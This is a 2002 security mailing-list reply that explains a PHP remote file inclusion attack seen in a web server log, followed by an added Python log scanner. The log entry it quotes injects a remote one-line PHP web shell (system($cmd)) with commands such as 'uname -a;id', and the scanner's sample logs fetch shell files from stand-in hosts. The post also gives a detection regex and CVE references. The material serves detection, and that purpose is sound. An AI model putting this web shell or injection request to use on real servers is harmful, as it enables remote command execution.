Security Incidents mailing list archives
Re: Good practicle php attack example
From: "Steven M. Christey" <coley () linus mitre org>
Date: Wed, 18 Sep 2002 22:49:26 -0400 (EDT)
zeno <bugtraq () cgisecurity net> said:
> I figured a few people may find this interesting.
>
> 200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
>
> contents of www.jtecx.hpg.com.br/jtec.txt
> ------------------- start snip
> <?php system($cmd); ?>
> ------------------- end snip
A number of PHP scripts have demonstrated this type of vulnerability, which was documented in "A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications" by Shaun Clowes; see http://www.securereality.com.au/studyinscarlet.txt (http://www.zend.com/zend/art/art-oertli.php also looks useful). This has been a topic of discussion on the webappsec list.

Basically, PHP can allow the programmer to access files from remote sites. PHP scripts that don't properly filter arguments to an "include" command can have a remote URL injected by the attacker. PHP also allows you to define variables as a parameter (field) into the script. The combination of these factors makes it easy for an attacker to execute code in the vulnerable application. Note: this may be dependent on configuration and/or the PHP version.

Some vulnerable applications are:

BUGTRAQ:20001125 Security problems with TWIG webmail system
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2
(CVE: CVE-2000-1166)

BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2
(CVE: CAN-2002-0206)
[this could be the vulnerability being exploited in zeno's example]

BUGTRAQ:20020506 b2 php remote command execution
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2
(CVE: CAN-2002-0734)

BUGTRAQ:20020517 Phorum 3.3.2a remote command execution
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2
(CVE: CAN-2002-0764)

A generic Perl regular expression to catch some of these exploits is:

/\.php[2-9]?\?.*=http:\/\//

This seems to do a good job, although it could generate some false positives for valid PHP scripts that pass URLs as arguments, e.g. for redirecting the user out of the site.

- Steve

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
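The following is an added example, not code from the thread: it runs Steve's regular expression over Apache access-log lines to pick out remote-include attempts of the kind zeno captured. The first log line is zeno's from the thread; the other four are constructed here to show the cases the pattern handles and the ones it does not (a redirect script that legitimately takes a URL, an `https://` target, and a percent-encoded `http://`). The broadened pattern, the percent-decoding step and the `ignore_paths` allow-list for known redirectors are my additions, not part of the original post.

```python
import re
from urllib.parse import unquote

# Steve's pattern from the post, /\.php[2-9]?\?.*=http:\/\//, in Python syntax.
ORIGINAL_PATTERN = re.compile(r"\.php[2-9]?\?.*=http://")

# Broadened variant (added here, not from the post): also matches https:// and
# ftp:// targets. Percent-encoded schemes are handled by decoding first (below).
BROAD_PATTERN = re.compile(r"\.php[2-9]?\?.*=(?:https?|ftp)://", re.IGNORECASE)

# Apache combined-format lines. Line 1 is zeno's from the thread; lines 2-5 are
# constructed for this example (RFC 1918 / example.* hosts, not real traffic).
SAMPLE_LOG = """\
200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
10.0.0.5 - - [14/Sep/2002:16:50:01 -0400] "GET /index.php?file=about.php HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
10.0.0.6 - - [14/Sep/2002:16:52:17 -0400] "GET /redirect.php?url=http://www.example.org/ HTTP/1.0" 302 0 "-" "Mozilla/4.0"
10.0.0.7 - - [14/Sep/2002:16:55:42 -0400] "GET /index.php3?file=https://evil.example/shell.txt&cmd=id HTTP/1.0" 200 512 "-" "Mozilla/4.0"
10.0.0.8 - - [14/Sep/2002:16:58:03 -0400] "GET /index.php?file=http%3A%2F%2Fevil.example%2Fshell.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""

# Minimal parser for the client, request target and status of a combined-format line.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) '
)


def parse_line(line):
    """Return the parsed fields of one log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text, pattern=ORIGINAL_PATTERN, decode=False, ignore_paths=frozenset()):
    """Return (client, target, status) for every request whose target matches `pattern`.

    The pattern is applied to the request target only, not the whole log line, so
    a URL in the Referer or User-Agent field cannot trigger it.
    With decode=True the target is percent-decoded first, so that an encoded
    'http%3A%2F%2F' is seen as 'http://'. Paths listed in ignore_paths (e.g. a
    known redirector script, the false positive Steve mentions) are skipped.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        target = rec["target"]
        path = target.split("?", 1)[0]
        if path in ignore_paths:
            continue
        if decode:
            target = unquote(target)
        if pattern.search(target):
            hits.append((rec["client"], rec["target"], rec["status"]))
    return hits


if __name__ == "__main__":
    print("original pattern:")
    for hit in scan(SAMPLE_LOG):
        print("  ", hit)
    print("broadened pattern, decoded, /redirect.php allow-listed:")
    for hit in scan(SAMPLE_LOG, BROAD_PATTERN, decode=True, ignore_paths={"/redirect.php"}):
        print("  ", hit)
```

With the original pattern the scan flags zeno's request and the redirect request (the false positive Steve describes) but misses the `https://` and percent-encoded variants; the broadened pattern with decoding catches those, and the allow-list of known URL-taking scripts removes the redirector. Note that a 404 status, as in zeno's line, does not mean the attempt failed to include anything: it is the response the vulnerable script happened to return, so match on the request, not on the status.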
Current thread:
- Good practicle php attack example zeno (Sep 17)
- Re: Good practicle php attack example Harald Finnaas (Sep 18)
- <Possible follow-ups>
- Re: Good practicle php attack example Steven M. Christey (Sep 19)
- Re: Good practicle php attack example Steven M. Christey (Sep 22)